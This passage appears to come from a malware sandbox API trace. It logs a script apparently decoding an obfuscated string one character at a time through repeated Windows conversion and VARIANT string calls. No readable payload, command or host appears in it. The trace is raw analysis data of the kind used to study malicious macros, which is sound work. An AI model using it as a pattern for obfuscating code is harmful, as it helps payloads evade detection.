out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.103] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.103] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.103] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.104] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.104] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.104] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.104] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.105] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.105] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.105] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.105] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="5", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="5", lpUsedDefaultChar=0x0) returned 1 [0084.105] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="(", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="(") returned 1 [0084.106] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.106] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.106] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.106] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.106] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.107] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="d", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="d", lpUsedDefaultChar=0x0) returned 1 [0084.107] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.107] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="W", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="W") returned 1 [0084.107] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0084.108] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.108] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.108] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.108] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="p", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="p", lpUsedDefaultChar=0x0) returned 1 [0084.109] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="c", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="c") returned 1 [0084.109] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.109] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.109] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.110] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="v", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="v", lpUsedDefaultChar=0x0) returned 1 [0084.110] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.110] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="i", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="i") returned 1 [0084.110] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="}", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="}", lpUsedDefaultChar=0x0) returned 1 [0084.111] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.111] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="p", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="p") returned 1 [0084.111] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x81", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x81", lpUsedDefaultChar=0x0) returned 1 [0084.111] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="t", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="t") returned 1 [0084.112] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.112] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr=";", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=";", lpUsedDefaultChar=0x0) returned 1 [0084.112] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.112] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=".", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr=".") returned 1 [0084.112] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.113] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="`", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="`", lpUsedDefaultChar=0x0) returned 1 [0084.113] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.113] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="S", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="S") returned 1 [0084.113] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="u", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="u", lpUsedDefaultChar=0x0) returned 1 [0084.114] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.114] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="h", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="h") returned 1 [0084.114] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.114] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.115] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.115] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.115] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0084.117] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.117] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0084.117] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.117] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="y", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="y", lpUsedDefaultChar=0x0) returned 1 [0084.118] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="l", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="l") returned 1 [0084.118] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.118] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="/", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="/", lpUsedDefaultChar=0x0) returned 1 [0084.118] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="\"", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="\"") returned 1 [0084.119] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.119] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="6", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="6", lpUsedDefaultChar=0x0) returned 1 [0084.119] VarSub (in: pvarLeft=0x28f65c, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=")", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr=")") returned 1 [0084.119] VarCat (in: pvarLeft=0x28f4bc, pvarRight=0x28f588, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.120] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.120] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.125] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.125] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.125] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.125] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.126] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.126] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.126] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.126] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.127] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.127] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.127] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.127] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.127] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.128] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.128] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.128] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.128] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.128] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.129] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="|", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="|", lpUsedDefaultChar=0x0) returned 1 [0084.129] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.129] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="o", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="o") returned 1 [0084.129] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.130] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.130] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.130] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.130] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.130] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.131] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.131] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.131] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="\x7f", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x7f", lpUsedDefaultChar=0x0) returned 1 [0084.132] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="r", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="r") returned 1 [0084.132] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.132] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.132] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.132] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.133] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.133] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="€", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x80", lpUsedDefaultChar=0x0) returned 1 [0084.133] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.133] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="s", cbMultiByte=1, lpWideCharStr=0xe4a924, cchWideChar=1 | out: lpWideCharStr="s") returned 1 [0084.133] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="‚", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x82", lpUsedDefaultChar=0x0) returned 1 [0084.134] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.134] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="u", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="u") returned 1 [0084.134] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.134] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="z", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="z", lpUsedDefaultChar=0x0) returned 1 [0084.135] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.135] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="m", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr="m") returned 1 [0084.135] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.135] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.135] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="e", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="e") returned 1 [0084.136] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.136] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="-", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="-", lpUsedDefaultChar=0x0) returned 1 [0084.136] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.136] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=" ", cbMultiByte=1, lpWideCharStr=0xe4a8ac, cchWideChar=1 | out: lpWideCharStr=" ") returned 1 [0084.136] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="{", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{", lpUsedDefaultChar=0x0) returned 1 [0084.137] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.137] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr="n", cbMultiByte=1, lpWideCharStr=0xe4a8fc, cchWideChar=1 | out: lpWideCharStr="n") returned 1 [0084.137] VarCat (in: pvarLeft=0x28f558, pvarRight=0x28f48c, pvarResult=0x28f434 | out: pvarResult=0x28f434) returned 0x0 [0084.137] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="r", cchWideChar=1, lpMultiByteStr=0x28f18e, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="r", lpUsedDefaultChar=0x0) returned 1 [0084.138] VarSub (in: pvarLeft=0x28f588, pvarRight=0x28f404, pvarResult=0x28f434 | out: 